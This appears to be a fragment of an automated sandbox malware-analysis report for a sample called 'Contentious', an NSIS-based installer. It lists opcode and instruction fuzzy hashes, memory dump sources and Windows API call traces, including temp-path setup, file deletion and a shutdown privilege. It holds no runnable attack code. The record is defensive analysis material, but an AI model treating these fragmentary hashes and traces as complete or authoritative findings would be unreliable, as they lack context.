                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f77375ffd93e620ef5f3408bc060799ae36ccab688a0ce95e36626f34930c2fd
                                            • Instruction ID: 1a42b573b4c9169d3d28f0c40a25790b50debd63e926a6b5cf1bdffe1910bfa0
                                            • Opcode Fuzzy Hash: f77375ffd93e620ef5f3408bc060799ae36ccab688a0ce95e36626f34930c2fd
                                            • Instruction Fuzzy Hash: 56211A74D04609CFCB11DFA8D8485EDBFF0BF4A315F14416AD859BB260EB301985CBA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44fdb162ff74898a4a94c58f779c55949a07afb70a930b479db5076c95e14541
                                            • Instruction ID: ceef9479785222ee353e56dd36fb6cb00b2a9d331a950e6e9aad422cd948da86
                                            • Opcode Fuzzy Hash: 44fdb162ff74898a4a94c58f779c55949a07afb70a930b479db5076c95e14541
                                            • Instruction Fuzzy Hash: 8F01F571604144AFCB028E64D8206EE3FB7DFC9352B58807AF918DB291DB758C069BA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e6964f764c626f0c8a6c1ca3dd157d59374bda0d1a7da58f2e725cc6f90fcbf
                                            • Instruction ID: 2c18ad85053436eb701386f502f0be7a0b6e5d1ab879b88964097965f1d10bca
                                            • Opcode Fuzzy Hash: 6e6964f764c626f0c8a6c1ca3dd157d59374bda0d1a7da58f2e725cc6f90fcbf
                                            • Instruction Fuzzy Hash: 3101B1366093844FCB065B7498644AE3F76EFD731071940ABE64ACB6A2DA648C4AC752
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2621ee099ebbf4cb302013922e4074ac0c8ba4d7518108142f585e43e1f325c9
                                            • Instruction ID: 5830c2a34c68ba5ec67765c99c0e58470f0be7aa778bb3796cf20e360d813a83
                                            • Opcode Fuzzy Hash: 2621ee099ebbf4cb302013922e4074ac0c8ba4d7518108142f585e43e1f325c9
                                            • Instruction Fuzzy Hash: 98017C767002148FC714CBAAD598F16B7E6FF88721F10846DE6198B3A5CB71EC45CB10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 884a398fdb9bb5c80bc57a259b93d28052d0570c906edae0ab922a9769059dd1
                                            • Instruction ID: e4d4e44216f102666991275749e51096ff1709f5595759a2dfad1c3d4f52c924
                                            • Opcode Fuzzy Hash: 884a398fdb9bb5c80bc57a259b93d28052d0570c906edae0ab922a9769059dd1
                                            • Instruction Fuzzy Hash: 4D014C75E001199FCB149FB9D8489AE7BF9EF88250B404439F91A97351DB348E908BA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 550c96c17125f92363c9e14ce3e6472af72ac8a51fe88cb00cd6a9f77d50774c
                                            • Instruction ID: b29d13f4bdd99b3ee957550d81643da81cdd3f600d8505b570e3ffe8733614fd
                                            • Opcode Fuzzy Hash: 550c96c17125f92363c9e14ce3e6472af72ac8a51fe88cb00cd6a9f77d50774c
                                            • Instruction Fuzzy Hash: 8F019E769001099FCB10DFA4DC449EF7FF5EF88210B004579F82993251DB318E91CB92
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea500ab48b9d7be0520cae85622d2f4247e4fcd9f9c05483b691ecfc788706cb
                                            • Instruction ID: e5067178e36f60f81325987c351f748c98bb05b22b985cdd84ddf58ec6e1a03f
                                            • Opcode Fuzzy Hash: ea500ab48b9d7be0520cae85622d2f4247e4fcd9f9c05483b691ecfc788706cb
                                            • Instruction Fuzzy Hash: 8601DB306043540FC719AB39D89099A3BE3EFC0301B508E6DE04ACF6A7DE649D4E8BD1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a51309fb4b770f5a3cf35b277fe550cc5e8ffcf85fdf2b7a6cef9efda006b8f0
                                            • Instruction ID: 8aef057560b1c0b297590b90cd1ade93932867587743b6db329f12f642cd8bb4
                                            • Opcode Fuzzy Hash: a51309fb4b770f5a3cf35b277fe550cc5e8ffcf85fdf2b7a6cef9efda006b8f0
                                            • Instruction Fuzzy Hash: 6BF04F302002144FC718AB3AD854A9B77D7EFC0712B508E28A44A8F66ADE60AD498BD1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7f6d40b8dddccdd8966e809e4cd1c75ded4d168794d9999d5ecc1b5cc74646b
                                            • Instruction ID: a3708eb40335916d3350ea045dcb9e4540b1cd4be12ded433e676f6802f1410c
                                            • Opcode Fuzzy Hash: a7f6d40b8dddccdd8966e809e4cd1c75ded4d168794d9999d5ecc1b5cc74646b
                                            • Instruction Fuzzy Hash: 19F08272B085209FCB1547ADA414AAEBBB5DFC526171441BEE519D73A5CE72CC028B90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be20e6bf83a24e9c5e3bdad14a48f079727b857e0b5602edfb864bbbe898936b
                                            • Instruction ID: 44009e0d8b6ee3efc2253e61f4ee3ae7ee38b41a31bf8ed569a27077a436805c
                                            • Opcode Fuzzy Hash: be20e6bf83a24e9c5e3bdad14a48f079727b857e0b5602edfb864bbbe898936b
                                            • Instruction Fuzzy Hash: E5F062B6E001149E8B54DFAA944199FBFF5EB98340B10462AE909D3241E77059068BA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c972ee384922b83936750706eceb146063a9defb1f20d367c0295a9b9fa5d05
                                            • Instruction ID: a11b7575015015981282313767d2a5484da3fcf4b6bb982a3107b583d6e1182d
                                            • Opcode Fuzzy Hash: 6c972ee384922b83936750706eceb146063a9defb1f20d367c0295a9b9fa5d05
                                            • Instruction Fuzzy Hash: 57F05835300205DFC700CF6AC888D5ABBEAFF88721B608169EA098B335CB71EC51CB80
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad92a366439b06135d6f0b98b3cd4c49eda14ad54f043b1029b1d96c1db78949
                                            • Instruction ID: 55e755a9d8dcf39d026b531d6ec10406197709f0132b55251c7a299ef5709c11
                                            • Opcode Fuzzy Hash: ad92a366439b06135d6f0b98b3cd4c49eda14ad54f043b1029b1d96c1db78949
                                            • Instruction Fuzzy Hash: 99E09236D193965ECB039BB198104EEBF309DD3620B0642DBC0A5BB052EB601A4EC772
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b11c64dd0abef87c0a83862ba0301ff9248628e2283a9d8426db74dd9e1b6ef
                                            • Instruction ID: 742e3fff3204400ebc84b98b91e17e45476c7c7bcb4d05e9876d4b204e31f19e
                                            • Opcode Fuzzy Hash: 6b11c64dd0abef87c0a83862ba0301ff9248628e2283a9d8426db74dd9e1b6ef
                                            • Instruction Fuzzy Hash: 59F03AB1C1420ADFCB51DFB8845569E7FF0EF19204F6049AEC525EB252EB74424A8F81
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3177c1a0f71d23a033dfb6ed914a17f216ceb2593982d85fb4c4e1fc7e1772c0
                                            • Instruction ID: 4e50ec920122992fdec2fa5640bb457e5e681afc8b37f0c2bcb5c7dcb2966925
                                            • Opcode Fuzzy Hash: 3177c1a0f71d23a033dfb6ed914a17f216ceb2593982d85fb4c4e1fc7e1772c0
                                            • Instruction Fuzzy Hash: BBE04F327061209F87248A6DE894C9BBBA9EFC976531541BEE50ADB721CA71DC42CB90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe6f61a6b3c6d7a9b023cf4cff1c9c76784bbdafc9cc4a6e7fe6e05bd77e0631
                                            • Instruction ID: 6468ceeb1a03dc99a428e5ee688e846a5dbcd150b1343d970dcbe48d5262e5ab
                                            • Opcode Fuzzy Hash: fe6f61a6b3c6d7a9b023cf4cff1c9c76784bbdafc9cc4a6e7fe6e05bd77e0631
                                            • Instruction Fuzzy Hash: 21E086723083904BD751D3BCE4642C97B92DFD5355B1442BEE849DF29DEF108D899391
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32a8150f391f291a6c7d6c75a094ebd00c32c3fb84acf5ec05e60e644bc9b85b
                                            • Instruction ID: 6212981105f251344f00c092e9729b0371e7b3475aa3b847c4118aaa295fa488
                                            • Opcode Fuzzy Hash: 32a8150f391f291a6c7d6c75a094ebd00c32c3fb84acf5ec05e60e644bc9b85b
                                            • Instruction Fuzzy Hash: B1E0C2B0D1020ADFCB80EFB884057AEBFF0AB08301FA0896AC925E7241E77496458B81
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa3cbd763bef459838784e02dd63b2673a8b02fbcbe9e9d7d43c0950719c1c22
                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                            • Opcode Fuzzy Hash: fa3cbd763bef459838784e02dd63b2673a8b02fbcbe9e9d7d43c0950719c1c22
                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction ID: 7960d51d526fba272fafbbdd8c30103bf7f2efd89ecdb8d8f0d1063ed23c0432
                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction Fuzzy Hash: 0BC0123310C1246A9624204F7C409A36B4CD2C17B5D250137F92CE720059429C4441B4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 744c4cf9a46c488ed69b8377bb46f9bd5a84a8a354d09abcd53f37c15ab25109
                                            • Instruction ID: 52a62f4858b1cdf6b325e09ab80fa74306a11e9d811417f023c2bb80769cb905
                                            • Opcode Fuzzy Hash: 744c4cf9a46c488ed69b8377bb46f9bd5a84a8a354d09abcd53f37c15ab25109
                                            • Instruction Fuzzy Hash: 0CD0C736300114774B051B59A8048AF7B6EE7C9771705803BF91DC3710CE714D5297D5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d469479e75a8e10295a0962b89b0bc0d8e863e9d89d08b5e970906453d5e2275
                                            • Instruction ID: f944856e87a58d2741225c203555037ff45e7d65e2a60780471f63394e48f3e9
                                            • Opcode Fuzzy Hash: d469479e75a8e10295a0962b89b0bc0d8e863e9d89d08b5e970906453d5e2275
                                            • Instruction Fuzzy Hash: D5D0677AB410189FCB049F98EC408DDB7B6FF9C221B448116E915A3261C6319961DB50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 038de3078f244647568774a859e89904e393ece63d80edc465d17ba43c7b09f8
                                            • Instruction ID: d4f3782ec0b559e3e7a18e372945c8d906636aa02ff1a4ff0ab440ed324f1b49
                                            • Opcode Fuzzy Hash: 038de3078f244647568774a859e89904e393ece63d80edc465d17ba43c7b09f8
                                            • Instruction Fuzzy Hash: DCD02B7440C3814FCB13E330E8A14C83F316BC1306F4006A9F90A4D47BE97805C94B52
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea14e12916a64b6fcd8f18aa13759c9c8235858f759d102f3bf2161f2b940fb6
                                            • Instruction ID: c1ba820f1189eccdd4bff922ccdc22a50591a82992dc9d643859d747647b4639
                                            • Opcode Fuzzy Hash: ea14e12916a64b6fcd8f18aa13759c9c8235858f759d102f3bf2161f2b940fb6
                                            • Instruction Fuzzy Hash: 54D06774904118CBCB20DFA4ED482DDB7B0EB85312F1014E7D80DB2610D7305E948F11
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d893521ffb6c03523ba06d701b69e631eadbbf022248c9351a083d1f68cca94b
                                            • Instruction ID: 0d9ec7bcbfc4c9bb18ec26538c8d6b078302e07fa3dbc13e34f2ba622c8e95c3
                                            • Opcode Fuzzy Hash: d893521ffb6c03523ba06d701b69e631eadbbf022248c9351a083d1f68cca94b
                                            • Instruction Fuzzy Hash: C0C012705443198BC541E775E985559776AABC0303F404910B60D0A52AEE7829D547D1
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404A55
                                            • GetDlgItem.USER32(?,00000408), ref: 00404A60
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AAA
                                            • LoadBitmapW.USER32(0000006E), ref: 00404ABD
                                            • SetWindowLongW.USER32(?,000000FC,00405035), ref: 00404AD6
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AEA
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AFC
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404B12
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404B1E
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404B30
                                            • DeleteObject.GDI32(00000000), ref: 00404B33
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404B5E
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404B6A
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C00
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404C2B
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C3F
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404C6E
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404C7C
                                            • ShowWindow.USER32(?,00000005), ref: 00404C8D
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404D8A
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404DEF
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404E04
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404E28
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404E48
                                            • ImageList_Destroy.COMCTL32(?), ref: 00404E5D
                                            • GlobalFree.KERNEL32(?), ref: 00404E6D
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404EE6
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404F8F
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F9E
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FBE
                                            • ShowWindow.USER32(?,00000000), ref: 0040500C
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405017
                                            • ShowWindow.USER32(00000000), ref: 0040501E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            APIs
                                            • #17.COMCTL32 ref: 0040321E
                                            • SetErrorMode.KERNEL32(00008001), ref: 00403229
                                            • OleInitialize.OLE32(00000000), ref: 00403230
                                              • Part of subcall function 00406183: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                              • Part of subcall function 00406183: LoadLibraryA.KERNEL32(?,?,00000020,00403242,00000009), ref: 004061A0
                                              • Part of subcall function 00406183: GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            • SHGetFileInfoW.SHELL32(00420670,00000000,?,000002B4,00000000), ref: 00403258
                                              • Part of subcall function 00405E19: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281C0,NSIS Error), ref: 00405E26
                                            • GetCommandLineW.KERNEL32(004281C0,NSIS Error), ref: 0040326D
                                            • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 00403280
                                            • CharNextW.USER32(00000000,00434000,00000020), ref: 004032A8
                                            • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 004033E0
                                            • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 004033F1
                                            • lstrcatW.KERNEL32(00436800,\Temp), ref: 004033FD
                                            • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 00403411
                                            • lstrcatW.KERNEL32(00436800,Low), ref: 00403419
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 0040342A
                                            • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 00403432
                                            • DeleteFileW.KERNEL32(00436000), ref: 00403446
                                            • OleUninitialize.OLE32(?), ref: 00403511
                                            • ExitProcess.KERNEL32 ref: 00403531
                                            • lstrcatW.KERNEL32(00436800,~nsu.tmp), ref: 0040353D
                                            • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403549
                                            • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403555
                                            • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040355C
                                            • DeleteFileW.KERNEL32(0041FE70,0041FE70,?,0042A000,?), ref: 004035B6
                                            • CopyFileW.KERNEL32(00437800,0041FE70,00000001), ref: 004035CA
                                            • CloseHandle.KERNEL32(00000000,0041FE70,0041FE70,?,0041FE70,00000000), ref: 004035F7
                                            • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 00403651
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004036A9
                                            • ExitProcess.KERNEL32 ref: 004036CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                            • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                            • API String ID: 4107622049-400301585
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8B
                                            • ShowWindow.USER32(?), ref: 00403BA8
                                            • DestroyWindow.USER32 ref: 00403BBC
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403BD8
                                            • GetDlgItem.USER32(?,?), ref: 00403BF9
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403C0D
                                            • IsWindowEnabled.USER32(00000000), ref: 00403C14
                                            • GetDlgItem.USER32(?,00000001), ref: 00403CC2
                                            • GetDlgItem.USER32(?,00000002), ref: 00403CCC
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403CE6
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403D37
                                            • GetDlgItem.USER32(?,00000003), ref: 00403DDD
                                            • ShowWindow.USER32(00000000,?), ref: 00403DFE
                                            • EnableWindow.USER32(?,?), ref: 00403E10
                                            • EnableWindow.USER32(?,?), ref: 00403E2B
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E41
                                            • EnableMenuItem.USER32(00000000), ref: 00403E48
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403E60
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E73
                                            • lstrlenW.KERNEL32(004226B0,?,004226B0,004281C0), ref: 00403E9C
                                            • SetWindowTextW.USER32(?,004226B0), ref: 00403EB0
                                            • ShowWindow.USER32(?,0000000A), ref: 00403FE4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                            • String ID:
                                            • API String ID: 184305955-0
                                            APIs
                                            • DeleteFileW.KERNEL32(?,?,00436800,74DF3420,00434000), ref: 004056CA
                                            • lstrcatW.KERNEL32(004246B8,\*.*), ref: 00405712
                                            • lstrcatW.KERNEL32(?,00409014), ref: 00405735
                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246B8,?,?,00436800,74DF3420,00434000), ref: 0040573B
                                            • FindFirstFileW.KERNEL32(004246B8,?,?,?,00409014,?,004246B8,?,?,00436800,74DF3420,00434000), ref: 0040574B
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004057EB
                                            • FindClose.KERNEL32(00000000), ref: 004057FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 2035342205-1173974218
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
